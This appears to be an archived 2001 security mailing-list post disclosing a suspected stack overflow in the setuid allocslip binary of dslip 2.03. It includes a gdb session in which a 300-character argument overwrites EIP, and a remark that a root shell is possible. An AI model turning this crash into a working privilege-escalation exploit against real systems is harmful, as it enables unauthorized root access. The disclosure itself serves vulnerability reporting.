I have the feeling that allocslip in dslip package has overflow in it, (since it's setuid it should bring a rootshell with careful exploit). Here's how i tested it: pakage Dslip, version 2.03 (sunsite.unc.edu/pub/Linux/system/Network/serial/dslip203.tgz) The package is rather old, but I found it being used on some Linux machines around. gdb allocslip GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc... (no debugging symbols found)... (gdb) run b_s `perl -e ' printf "A" x 300'` [usual GDB mesages] GO! sh: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: command not found Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info registers shows: ebp 0x41414141 0x41414141 esi 0x40001fb0 1073749936 edi 0x80487f8 134514680 eip 0x41414141 0x41414141 obviously stack is smashed.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:02:07 PDT